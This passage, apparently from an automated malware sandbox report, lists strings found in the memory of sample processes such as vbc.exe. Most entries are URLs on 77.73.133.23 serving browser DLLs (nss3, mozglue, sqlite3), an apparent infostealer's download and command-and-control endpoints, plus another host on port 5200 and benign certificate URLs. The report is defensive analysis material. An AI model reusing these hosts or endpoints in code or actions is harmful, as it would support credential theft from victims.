00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.375760320.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllHm
Source: vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllVm
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dlltm
Source: vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dlll
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.372841616.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
Source: vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dllHm
Source: vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dllVm
Source: vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dlltm
Source: vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dlll
Source: vbc.exe, 00000035.00000003.369358823.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369599451.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369358823.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll
Source: vbc.exe, 00000035.00000003.369358823.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllHm
Source: vbc.exe, 00000035.00000003.369358823.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dllllVm
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369358823.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dllx&m~
Source: vbc.exe, 00000035.00000003.369470849.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373651620.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.371347945.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.368157203.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.379081489.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448875909.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.410280008.0000000000D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
Source: vbc.exe, 00000035.00000003.367958262.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369470849.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373651620.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.371347945.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll7Jy
Source: vbc.exe, 00000035.00000003.423882259.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376739659.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.385800934.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401081408.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.367958262.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.410942544.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461128866.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402544214.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369470849.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373651620.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.371347945.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.379081489.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448875909.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllPK
Source: vbc.exe, 00000035.00000003.367958262.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlliK
Source: vbc.exe, 00000035.00000003.367440919.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllshqos.dll.mui
Source: vbc.exe, 00000035.00000003.367958262.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369470849.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlltK
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378201688.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.410280008.0000000000D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.410280008.0000000000D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll.
Source: vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllHm
Source: vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlldllVm
Source: vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dlll
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.383102224.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
Source: vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldllHm
Source: vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlldllVm
Source: vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dlll
Source: vbc.exe, 00000035.00000003.386777264.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373315641.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378814695.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425440272.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll0mh
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllHm
Source: vbc.exe, 00000035.00000003.371698154.0000000000D86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllK
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllVm
Source: vbc.exe, 00000035.00000003.371046785.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlltm
Source: vbc.exe, 00000035.00000003.454032435.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.451830537.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402976141.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86f
Source: vbc.exe, 00000035.00000003.453431794.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425246319.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425463302.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400556069.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.451363577.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.410695262.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461128866.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.425593569.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401693290.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402470097.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.448875909.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401016437.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01
Source: vbc.exe, 00000035.00000003.400038748.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.422945644.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.449463137.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.462302515.0000000000D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01KB4484246)
Source: vbc.exe, 00000035.00000003.400556069.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01M6t
Source: vbc.exe, 00000035.00000003.410695262.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402470097.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401016437.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01Xu
Source: vbc.exe, 00000035.00000003.401016437.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/c84aa86fe2f5ead241f248a7a8ab0e01y
Source: vbc.exe, 00000002.00000002.374200446.000000000760A000.00000004.00000800.00020000.00000000.sdmp, conchsvt.exe, 0000000C.00000000.306464420.0000000000512000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://89.208.137.159:5200/add/
Source: N2wufLmC74.exe	String found in binary or memory: http://aia.entrust.net/evcs1-chain256.cer01
Source: nss3.dll.53.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: N2wufLmC74.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3.dll.53.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.53.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: N2wufLmC74.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: N2wufLmC74.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: vbc.exe, 00000002.00000002.376159529.0000000007674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: N2wufLmC74.exe	String found in binary or memory: http://crl.entrust.net/evcs1.crl0
Source: N2wufLmC74.exe	String found in binary or memory: http://crl.entrust.net/g2ca.crl0;
Source: N2wufLmC74.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.53.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.53.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: N2wufLmC74.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: N2wufLmC74.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.53.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.53.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: nss3.dll.53.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.53.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: nss3.dll.53.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
